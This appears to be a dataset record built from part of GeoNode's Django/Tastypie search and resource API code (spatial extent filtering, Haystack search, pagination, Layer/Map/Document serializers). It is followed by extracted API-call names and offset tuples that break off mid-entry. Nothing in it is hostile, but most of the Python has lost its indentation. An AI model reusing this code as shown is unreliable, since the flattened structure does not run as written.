def filter_bbox(self, queryset, extent_filter):
from geonode.utils import bbox_to_projection
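        # The 'extent' filter is expected to be a comma separated string "x0,y0,x1,y1"
        # (lon/lat, assumed EPSG:4326), e.g. extent=-10,40,10,60 (illustrative values);
        # resources stored in other projections are matched by reprojecting this box below.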
bbox = extent_filter.split(',')
bbox = list(map(str, bbox))
intersects = (Q(bbox_x0__gte=bbox[0]) & Q(bbox_x1__lte=bbox[2]) &
Q(bbox_y0__gte=bbox[1]) & Q(bbox_y1__lte=bbox[3]))
for proj in Layer.objects.order_by('srid').values('srid').distinct():
if proj['srid'] != 'EPSG:4326':
proj_bbox = bbox_to_projection(bbox + ['4326', ],
target_srid=int(proj['srid'][5:]))
if proj_bbox[-1] != 4326:
intersects = intersects | (Q(bbox_x0__gte=proj_bbox[0]) & Q(bbox_x1__lte=proj_bbox[2]) & Q(
bbox_y0__gte=proj_bbox[1]) & Q(bbox_y1__lte=proj_bbox[3]))
return queryset.filter(intersects)
def build_haystack_filters(self, parameters):
from haystack.inputs import Raw
from haystack.query import SearchQuerySet, SQ # noqa
sqs = None
# Retrieve Query Params
# Text search
query = parameters.get('q', None)
# Types and subtypes to filter (map, layer, vector, etc)
type_facets = parameters.getlist("type__in", [])
# If coming from explore page, add type filter from resource_name
resource_filter = self._meta.resource_name.rstrip("s")
if resource_filter != "base" and resource_filter not in type_facets:
type_facets.append(resource_filter)
# Publication date range (start,end)
date_end = parameters.get("date__lte", None)
date_start = parameters.get("date__gte", None)
# Topic category filter
category = parameters.getlist("category__identifier__in")
# Keyword filter
keywords = parameters.getlist("keywords__slug__in")
# Region filter
regions = parameters.getlist("regions__name__in")
# Owner filters
owner = parameters.getlist("owner__username__in")
# Sort order
sort = parameters.get("order_by", "relevance")
# Geospatial Elements
bbox = parameters.get("extent", None)
# Filter by Type and subtype
if type_facets is not None:
types = []
subtypes = []
for type in type_facets:
if type in {"map", "layer", "document", "user"}:
# Type is one of our Major Types (not a sub type)
types.append(type)
elif type in LAYER_SUBTYPES.keys():
subtypes.append(type)
if 'vector' in subtypes and 'vector_time' not in subtypes:
subtypes.append('vector_time')
if len(subtypes) > 0:
types.append("layer")
sqs = SearchQuerySet().narrow(f"subtype:{','.join(map(str, subtypes))}")
if len(types) > 0:
sqs = (SearchQuerySet() if sqs is None else sqs).narrow(
f"type:{','.join(map(str, types))}")
# Filter by Query Params
# haystack bug? if boosted fields aren't included in the
# query, then the score won't be affected by the boost
if query:
if query.startswith('"') or query.startswith('\''):
# Match exact phrase
phrase = query.replace('"', '')
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(title__exact=phrase) |
SQ(description__exact=phrase) |
SQ(content__exact=phrase)
)
else:
words = [
w for w in re.split(
r'\W',
query,
flags=re.UNICODE) if w]
for i, search_word in enumerate(words):
if i == 0:
sqs = (SearchQuerySet() if sqs is None else sqs) \
.filter(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
elif search_word in {"AND", "OR"}:
pass
elif words[i - 1] == "OR": # previous word OR this word
sqs = sqs.filter_or(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
else: # previous word AND this word
sqs = sqs.filter(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
# filter by category
if category:
sqs = (SearchQuerySet() if sqs is None else sqs).narrow(
f"category:{','.join(map(str, category))}")
# filter by keyword: use filter_or with keywords_exact
# not using exact leads to fuzzy matching and too many results
# using narrow with exact leads to zero results if multiple keywords
# selected
if keywords:
for keyword in keywords:
sqs = (
SearchQuerySet() if sqs is None else sqs).filter_or(
keywords_exact=keyword)
# filter by regions: use filter_or with regions_exact
# not using exact leads to fuzzy matching and too many results
# using narrow with exact leads to zero results if multiple keywords
# selected
if regions:
for region in regions:
sqs = (
SearchQuerySet() if sqs is None else sqs).filter_or(
regions_exact__exact=region)
# filter by owner
if owner:
sqs = (
SearchQuerySet() if sqs is None else sqs).narrow(
f"owner__username:{','.join(map(str, owner))}")
# filter by date
if date_start:
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(date__gte=date_start)
)
if date_end:
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(date__lte=date_end)
)
# Filter by geographic bounding box
if bbox:
left, bottom, right, top = bbox.split(',')
sqs = (
SearchQuerySet() if sqs is None else sqs).exclude(
SQ(
bbox_top__lte=bottom) | SQ(
bbox_bottom__gte=top) | SQ(
bbox_left__gte=right) | SQ(
bbox_right__lte=left))
# Apply sort
if sort.lower() == "-date":
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("-date")
elif sort.lower() == "date":
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("date")
elif sort.lower() == "title":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"title_sortable")
elif sort.lower() == "-title":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"-title_sortable")
elif sort.lower() == "-popular_count":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"-popular_count")
else:
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("-date")
return sqs
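    # Illustrative only: build_haystack_filters() above is driven entirely by request.GET,
    # e.g. /api/base/search/?q=rivers&type__in=layer&extent=-10,40,10,60&order_by=-date
    # (made-up example values).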
def get_search(self, request, **kwargs):
self.method_check(request, allowed=['get'])
self.is_authenticated(request)
self.throttle_check(request)
# Get the list of objects that matches the filter
sqs = self.build_haystack_filters(request.GET)
if not settings.SKIP_PERMS_FILTER:
filter_set = get_objects_for_user(
request.user, 'base.view_resourcebase')
filter_set = get_visible_resources(
filter_set,
request.user if request else None,
admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,
unpublished_not_visible=settings.RESOURCE_PUBLISHING,
private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)
filter_set_ids = filter_set.values_list('id')
# Do the query using the filterset and the query term. Facet the
# results
if len(filter_set) > 0:
                sqs = sqs.filter(id__in=filter_set_ids).facet('type').facet('subtype').facet(
                    'owner').facet('keywords').facet('regions').facet('category')
else:
sqs = None
else:
sqs = sqs.facet('type').facet('subtype').facet(
'owner').facet('keywords').facet('regions').facet('category')
if sqs:
# Build the Facet dict
facets = {}
for facet in sqs.facet_counts()['fields']:
facets[facet] = {}
for item in sqs.facet_counts()['fields'][facet]:
facets[facet][item[0]] = item[1]
# Paginate the results
paginator = Paginator(sqs, request.GET.get('limit'))
try:
                page = paginator.page(
                    int(request.GET.get('offset') or 0) //
                    int(request.GET.get('limit') or 1) + 1)
except InvalidPage:
raise Http404("Sorry, no results on that page.")
if page.has_previous():
previous_page = page.previous_page_number()
else:
previous_page = 1
if page.has_next():
next_page = page.next_page_number()
else:
next_page = 1
total_count = sqs.count()
objects = page.object_list
else:
next_page = 0
previous_page = 0
total_count = 0
facets = {}
objects = []
object_list = {
"meta": {
"limit": settings.CLIENT_RESULTS_LIMIT,
"next": next_page,
"offset": int(getattr(request.GET, 'offset', 0)),
"previous": previous_page,
"total_count": total_count,
"facets": facets,
},
"objects": [self.get_haystack_api_fields(x) for x in objects],
}
self.log_throttled_access(request)
return self.create_response(request, object_list)
def get_haystack_api_fields(self, haystack_object):
return {k: v for k, v in haystack_object.get_stored_fields().items()
if not re.search('_exact$|_sortable$', k)}
def get_list(self, request, **kwargs):
"""
Returns a serialized list of resources.
Calls ``obj_get_list`` to provide the data, then handles that result
set and serializes it.
Should return a HttpResponse (200 OK).
"""
# TODO: Uncached for now. Invalidation that works for everyone may be
# impossible.
base_bundle = self.build_bundle(request=request)
objects = self.obj_get_list(
bundle=base_bundle,
**self.remove_api_resource_names(kwargs))
sorted_objects = self.apply_sorting(objects, options=request.GET)
paginator = self._meta.paginator_class(
request.GET,
sorted_objects,
resource_uri=self.get_resource_uri(),
limit=self._meta.limit,
max_limit=self._meta.max_limit,
collection_name=self._meta.collection_name)
to_be_serialized = paginator.page()
to_be_serialized = self.alter_list_data_to_serialize(
request,
to_be_serialized)
return self.create_response(
request, to_be_serialized, response_objects=objects)
def format_objects(self, objects):
"""
Format the objects for output in a response.
"""
for key in ('site_url', 'has_time'):
if key in self.VALUES:
idx = self.VALUES.index(key)
del self.VALUES[idx]
# hack needed because dehydrate does not seem to work in CommonModelApi
formatted_objects = []
for obj in objects:
formatted_obj = model_to_dict(obj, fields=self.VALUES)
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
            if not formatted_obj.get('thumbnail_url'):
formatted_obj['thumbnail_url'] = staticfiles.static(settings.MISSING_THUMBNAIL)
formatted_obj['owner__username'] = obj.owner.username
formatted_obj['owner_name'] = obj.owner.get_full_name() or obj.owner.username
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
formatted_objects.append(formatted_obj)
return formatted_objects
def create_response(
self,
request,
data,
response_class=HttpResponse,
response_objects=None,
**response_kwargs):
"""
Extracts the common "which-format/serialize/return-response" cycle.
Mostly a useful shortcut/hook.
"""
        # If a user does not have at least view permissions, they won't be able
# to see the resource at all.
filtered_objects_ids = None
try:
if data['objects']:
filtered_objects_ids = [
item.id for item in data['objects'] if request.user.has_perm(
'view_resourcebase', item.get_self_resource())]
except Exception:
pass
if isinstance(
data,
dict) and 'objects' in data and not isinstance(
data['objects'],
list):
if filtered_objects_ids:
data['objects'] = [
x for x in list(
self.format_objects(
data['objects'])) if x['id'] in filtered_objects_ids]
else:
data['objects'] = list(self.format_objects(data['objects']))
# give geonode version
data['geonode_version'] = get_version()
desired_format = self.determine_format(request)
serialized = self.serialize(request, data, desired_format)
return response_class(
content=serialized,
content_type=build_content_type(desired_format),
**response_kwargs)
def prepend_urls(self):
if settings.HAYSTACK_SEARCH:
return [
url(r"^(?P<resource_name>%s)/search%s$" % (
self._meta.resource_name, trailing_slash()
),
self.wrap_view('get_search'), name="api_get_search"),
]
else:
return []
class ResourceBaseResource(CommonModelApi):
"""ResourceBase api"""
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = ResourceBase.objects.polymorphic_queryset() \
.distinct().order_by('-date')
resource_name = 'base'
excludes = ['csw_anytext', 'metadata_xml']
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class FeaturedResourceBaseResource(CommonModelApi):
"""Only the featured resourcebases"""
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = ResourceBase.objects.filter(featured=True).order_by('-date')
resource_name = 'featured'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class LayerResource(CommonModelApi):
"""Layer API"""
links = fields.ListField(
attribute='links',
null=True,
use_in='all',
default=[])
if check_ogc_backend(qgis_server.BACKEND_PACKAGE):
default_style = fields.ForeignKey(
'geonode.api.api.StyleResource',
attribute='qgis_default_style',
null=True)
styles = fields.ManyToManyField(
'geonode.api.api.StyleResource',
attribute='qgis_styles',
null=True,
use_in='detail')
elif check_ogc_backend(geoserver.BACKEND_PACKAGE):
default_style = fields.ForeignKey(
'geonode.api.api.StyleResource',
attribute='default_style',
null=True)
styles = fields.ManyToManyField(
'geonode.api.api.StyleResource',
attribute='styles',
null=True,
use_in='detail')
def format_objects(self, objects):
"""
Formats the object.
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
# includes other values
values = self.VALUES + [
'alternate',
'name'
]
formatted_obj = model_to_dict(obj, fields=values)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
# provide style information
bundle = self.build_bundle(obj=obj)
formatted_obj['default_style'] = self.default_style.dehydrate(
bundle, for_list=True)
# Add resource uri
formatted_obj['resource_uri'] = self.get_resource_uri(bundle)
formatted_obj['links'] = self.dehydrate_ogc_links(bundle)
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'dataset'
formatted_obj['online'] = True
if hasattr(obj, 'storeType'):
formatted_obj['store_type'] = obj.storeType
if obj.storeType == 'remoteStore' and hasattr(obj, 'remote_service'):
if obj.remote_service:
formatted_obj['online'] = (obj.remote_service.probe == 200)
else:
formatted_obj['online'] = False
formatted_obj['gtype'] = self.dehydrate_gtype(bundle)
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
formatted_obj['processed'] = obj.instance_is_processed
# put the object on the response stack
formatted_objects.append(formatted_obj)
return formatted_objects
def _dehydrate_links(self, bundle, link_types=None):
"""Dehydrate links field."""
dehydrated = []
obj = bundle.obj
link_fields = [
'extension',
'link_type',
'name',
'mime',
'url'
]
links = obj.link_set.all()
if link_types:
links = links.filter(link_type__in=link_types)
for lnk in links:
formatted_link = model_to_dict(lnk, fields=link_fields)
dehydrated.append(formatted_link)
return dehydrated
def dehydrate_links(self, bundle):
return self._dehydrate_links(bundle)
def dehydrate_ogc_links(self, bundle):
return self._dehydrate_links(bundle, ['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
def dehydrate_gtype(self, bundle):
return bundle.obj.gtype
def populate_object(self, obj):
"""Populate results with necessary fields
:param obj: Layer obj
:type obj: Layer
:return:
"""
if check_ogc_backend(qgis_server.BACKEND_PACKAGE):
# Provides custom links for QGIS Server styles info
# Default style
try:
obj.qgis_default_style = obj.qgis_layer.default_style
except Exception:
obj.qgis_default_style = None
# Styles
try:
obj.qgis_styles = obj.qgis_layer.styles
except Exception:
obj.qgis_styles = []
return obj
def build_bundle(
self, obj=None, data=None, request=None, **kwargs):
"""Override build_bundle method to add additional info."""
if obj is None and self._meta.object_class:
obj = self._meta.object_class()
elif obj:
obj = self.populate_object(obj)
return Bundle(
obj=obj,
data=data,
request=request, **kwargs)
def patch_detail(self, request, **kwargs):
"""Allow patch request to update default_style.
Request body must match this:
{
'default_style': <resource_uri_to_style>
}
"""
reason = 'Can only patch "default_style" field.'
try:
body = json.loads(request.body)
if 'default_style' not in body:
return http.HttpBadRequest(reason=reason)
match = resolve(body['default_style'])
style_id = match.kwargs['id']
api_name = match.kwargs['api_name']
resource_name = match.kwargs['resource_name']
if not (resource_name == 'styles' and api_name == 'api'):
raise Exception()
from geonode.qgis_server.models import QGISServerStyle
style = QGISServerStyle.objects.get(id=style_id)
layer_id = kwargs['id']
layer = Layer.objects.get(id=layer_id)
except Exception:
return http.HttpBadRequest(reason=reason)
from geonode.qgis_server.views import default_qml_style
request.method = 'POST'
response = default_qml_style(
request,
layername=layer.name,
style_name=style.name)
if isinstance(response, TemplateResponse):
if response.status_code == 200:
return HttpResponse(status=200)
return self.error_response(request, response.content)
# copy parent attribute before modifying
VALUES = CommonModelApi.VALUES[:]
VALUES.append('typename')
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = Layer.objects.distinct().order_by('-date')
resource_name = 'layers'
detail_uri_name = 'id'
include_resource_uri = True
allowed_methods = ['get', 'patch']
excludes = ['csw_anytext', 'metadata_xml']
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
filtering = CommonMetaApi.filtering
# Allow filtering using ID
filtering.update({
'id': ALL,
'name': ALL,
'alternate': ALL,
})
class MapResource(CommonModelApi):
"""Maps API"""
def format_objects(self, objects):
"""
Formats the objects and provides reference to list of layers in map
resources.
:param objects: Map objects
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
formatted_obj = model_to_dict(obj, fields=self.VALUES)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'map'
formatted_obj['online'] = True
# get map layers
map_layers = obj.layers
formatted_layers = []
map_layer_fields = [
'id',
'stack_order',
'format',
'name',
'opacity',
'group',
'visibility',
'transparent',
'ows_url',
'layer_params',
'source_params',
'local'
]
for layer in map_layers:
formatted_map_layer = model_to_dict(
layer, fields=map_layer_fields)
formatted_layers.append(formatted_map_layer)
formatted_obj['layers'] = formatted_layers
# replace thumbnail_url with curated_thumbs
try:
if hasattr(obj, 'curatedthumbnail'):
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
except Exception as e:
formatted_obj['thumbnail_url'] = ''
logger.exception(e)
formatted_objects.append(formatted_obj)
return formatted_objects
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = Map.objects.distinct().order_by('-date')
resource_name = 'maps'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class DocumentResource(CommonModelApi):
"""Documents API"""
def format_objects(self, objects):
"""
        Formats the objects for output in the documents API response.
        :param objects: Document objects
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
formatted_obj = model_to_dict(obj, fields=self.VALUES)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'dataset'
formatted_obj['online'] = True
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
try:
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
except Exception:
formatted_obj['thumbnail_url'] = ''
formatted_objects.append(formatted_obj)
return formatted_objects
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
filtering = CommonMetaApi.filtering
filtering.update({'doc_type': ALL})
queryset = Document.objects.distinct().order_by('-date')
resource_name = 'documents'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
|
[
"tastypie.utils.trailing_slash",
"tastypie.fields.ManyToManyField",
"logging.getLogger",
"tastypie.utils.mime.build_content_type",
"geonode.base.models.HierarchicalKeyword.objects.none",
"haystack.query.SQ",
"guardian.shortcuts.get_objects_for_user",
"geonode.layers.models.Layer.objects.get",
"json.loads",
"django.utils.translation.gettext",
"django.http.HttpResponse",
"tastypie.fields.ForeignKey",
"geonode.layers.models.Layer.objects.distinct",
"geonode.base.models.HierarchicalKeyword.get_tree",
"haystack.inputs.Raw",
"geonode.base.models.ResourceBase.objects.polymorphic_queryset",
"django.urls.resolve",
"django.http.Http404",
"tastypie.http.HttpBadRequest",
"re.search",
"geonode.get_version",
"geonode.maps.models.Map.objects.distinct",
"re.split",
"geonode.security.utils.get_visible_resources",
"django.contrib.staticfiles.templatetags.staticfiles.static",
"tastypie.fields.ListField",
"geonode.base.models.ResourceBase.objects.filter",
"tastypie.fields.ToOneField",
"django.forms.models.model_to_dict",
"geonode.groups.models.GroupProfile.objects.get",
"geonode.utils.check_ogc_backend",
"tastypie.fields.ToManyField",
"geonode.qgis_server.views.default_qml_style",
"django.db.models.Q",
"haystack.query.SearchQuerySet",
"tastypie.bundle.Bundle",
"geonode.layers.models.Layer.objects.order_by",
"geonode.qgis_server.models.QGISServerStyle.objects.get",
"geonode.documents.models.Document.objects.distinct",
"tastypie.authentication.SessionAuthentication"
] |
[((2674, 2701), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2691, 2701), False, 'import logging\n'), ((3456, 3510), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['TagResource', '"""keywords"""'], {'null': '(True)'}), "(TagResource, 'keywords', null=True)\n", (3474, 3510), False, 'from tastypie import fields\n'), ((3525, 3581), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['RegionResource', '"""regions"""'], {'null': '(True)'}), "(RegionResource, 'regions', null=True)\n", (3543, 3581), False, 'from tastypie import fields\n'), ((3597, 3671), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['TopicCategoryResource', '"""category"""'], {'null': '(True)', 'full': '(True)'}), "(TopicCategoryResource, 'category', null=True, full=True)\n", (3614, 3671), False, 'from tastypie import fields\n'), ((3717, 3780), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['GroupResource', '"""group"""'], {'null': '(True)', 'full': '(True)'}), "(GroupResource, 'group', null=True, full=True)\n", (3734, 3780), False, 'from tastypie import fields\n'), ((3826, 3879), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['OwnersResource', '"""owner"""'], {'full': '(True)'}), "(OwnersResource, 'owner', full=True)\n", (3843, 3879), False, 'from tastypie import fields\n'), ((3896, 3964), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['ThesaurusKeywordResource', '"""tkeywords"""'], {'null': '(True)'}), "(ThesaurusKeywordResource, 'tkeywords', null=True)\n", (3914, 3964), False, 'from tastypie import fields\n'), ((27125, 27197), 'tastypie.fields.ListField', 'fields.ListField', ([], {'attribute': '"""links"""', 'null': '(True)', 'use_in': '"""all"""', 'default': '[]'}), "(attribute='links', null=True, use_in='all', default=[])\n", (27141, 27197), False, 'from tastypie import fields\n'), ((27238, 27284), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['qgis_server.BACKEND_PACKAGE'], {}), '(qgis_server.BACKEND_PACKAGE)\n', (27255, 27284), False, 'from geonode.utils import check_ogc_backend\n'), ((9146, 9349), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['queryset', '(request.user if request else None)'], {'request': 'request', 'admin_approval_required': 'settings.ADMIN_MODERATE_UPLOADS', 'unpublished_not_visible': 'settings.RESOURCE_PUBLISHING'}), '(queryset, request.user if request else None, request=\n request, admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,\n unpublished_not_visible=settings.RESOURCE_PUBLISHING)\n', (9167, 9349), False, 'from geonode.security.utils import get_visible_resources\n'), ((9498, 9648), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['queryset', '(request.user if request else None)'], {'request': 'request', 'private_groups_not_visibile': 'settings.GROUP_PRIVATE_RESOURCES'}), '(queryset, request.user if request else None, request=\n request, private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)\n', (9519, 9648), False, 'from geonode.security.utils import get_visible_resources\n'), ((9819, 9853), 'geonode.base.models.HierarchicalKeyword.objects.none', 'HierarchicalKeyword.objects.none', ([], {}), '()\n', (9851, 9853), False, 'from geonode.base.models import HierarchicalKeyword\n'), ((27310, 27408), 'tastypie.fields.ForeignKey', 'fields.ForeignKey', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""qgis_default_style"""', 'null': '(True)'}), "('geonode.api.api.StyleResource', attribute=\n 'qgis_default_style', null=True)\n", (27327, 27408), 
False, 'from tastypie import fields\n'), ((27458, 27571), 'tastypie.fields.ManyToManyField', 'fields.ManyToManyField', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""qgis_styles"""', 'null': '(True)', 'use_in': '"""detail"""'}), "('geonode.api.api.StyleResource', attribute=\n 'qgis_styles', null=True, use_in='detail')\n", (27480, 27571), False, 'from tastypie import fields\n'), ((27625, 27669), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['geoserver.BACKEND_PACKAGE'], {}), '(geoserver.BACKEND_PACKAGE)\n', (27642, 27669), False, 'from geonode.utils import check_ogc_backend\n'), ((31812, 31858), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['qgis_server.BACKEND_PACKAGE'], {}), '(qgis_server.BACKEND_PACKAGE)\n', (31829, 31858), False, 'from geonode.utils import check_ogc_backend\n'), ((32626, 32679), 'tastypie.bundle.Bundle', 'Bundle', ([], {'obj': 'obj', 'data': 'data', 'request': 'request'}), '(obj=obj, data=data, request=request, **kwargs)\n', (32632, 32679), False, 'from tastypie.bundle import Bundle\n'), ((33881, 33952), 'geonode.qgis_server.views.default_qml_style', 'default_qml_style', (['request'], {'layername': 'layer.name', 'style_name': 'style.name'}), '(request, layername=layer.name, style_name=style.name)\n', (33898, 33952), False, 'from geonode.qgis_server.views import default_qml_style\n'), ((6401, 6404), 'django.db.models.Q', 'Q', ([], {}), '()\n', (6402, 6404), False, 'from django.db.models import Q\n'), ((10363, 10385), 'django.db.models.Q', 'Q', ([], {'keywords__in': 'treeqs'}), '(keywords__in=treeqs)\n', (10364, 10385), False, 'from django.db.models import Q\n'), ((10716, 10739), 'django.db.models.Q', 'Q', ([], {'bbox_y1__lte': 'bbox[3]'}), '(bbox_y1__lte=bbox[3])\n', (10717, 10739), False, 'from django.db.models import Q\n'), ((18540, 18600), 'guardian.shortcuts.get_objects_for_user', 'get_objects_for_user', (['request.user', '"""base.view_resourcebase"""'], {}), "(request.user, 'base.view_resourcebase')\n", (18560, 18600), False, 'from guardian.shortcuts import get_objects_for_user\n'), ((18644, 18897), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['filter_set', '(request.user if request else None)'], {'admin_approval_required': 'settings.ADMIN_MODERATE_UPLOADS', 'unpublished_not_visible': 'settings.RESOURCE_PUBLISHING', 'private_groups_not_visibile': 'settings.GROUP_PRIVATE_RESOURCES'}), '(filter_set, request.user if request else None,\n admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,\n unpublished_not_visible=settings.RESOURCE_PUBLISHING,\n private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)\n', (18665, 18897), False, 'from geonode.security.utils import get_visible_resources\n'), ((23040, 23078), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (23053, 23078), False, 'from django.forms.models import model_to_dict\n'), ((25343, 25356), 'geonode.get_version', 'get_version', ([], {}), '()\n', (25354, 25356), False, 'from geonode import get_version, qgis_server, geoserver\n'), ((26378, 26401), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (26399, 26401), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((26884, 26907), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (26905, 26907), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((27695, 
27788), 'tastypie.fields.ForeignKey', 'fields.ForeignKey', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""default_style"""', 'null': '(True)'}), "('geonode.api.api.StyleResource', attribute=\n 'default_style', null=True)\n", (27712, 27788), False, 'from tastypie import fields\n'), ((27838, 27945), 'tastypie.fields.ManyToManyField', 'fields.ManyToManyField', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""styles"""', 'null': '(True)', 'use_in': '"""detail"""'}), "('geonode.api.api.StyleResource', attribute='styles',\n null=True, use_in='detail')\n", (27860, 27945), False, 'from tastypie import fields\n'), ((28379, 28412), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'values'}), '(obj, fields=values)\n', (28392, 28412), False, 'from django.forms.models import model_to_dict\n'), ((31236, 31274), 'django.forms.models.model_to_dict', 'model_to_dict', (['lnk'], {'fields': 'link_fields'}), '(lnk, fields=link_fields)\n', (31249, 31274), False, 'from django.forms.models import model_to_dict\n'), ((33036, 33060), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (33046, 33060), False, 'import json\n'), ((33183, 33213), 'django.urls.resolve', 'resolve', (["body['default_style']"], {}), "(body['default_style'])\n", (33190, 33213), False, 'from django.urls import resolve\n'), ((33555, 33595), 'geonode.qgis_server.models.QGISServerStyle.objects.get', 'QGISServerStyle.objects.get', ([], {'id': 'style_id'}), '(id=style_id)\n', (33582, 33595), False, 'from geonode.qgis_server.models import QGISServerStyle\n'), ((33653, 33683), 'geonode.layers.models.Layer.objects.get', 'Layer.objects.get', ([], {'id': 'layer_id'}), '(id=layer_id)\n', (33670, 33683), False, 'from geonode.layers.models import Layer\n'), ((34692, 34715), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (34713, 34715), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((35466, 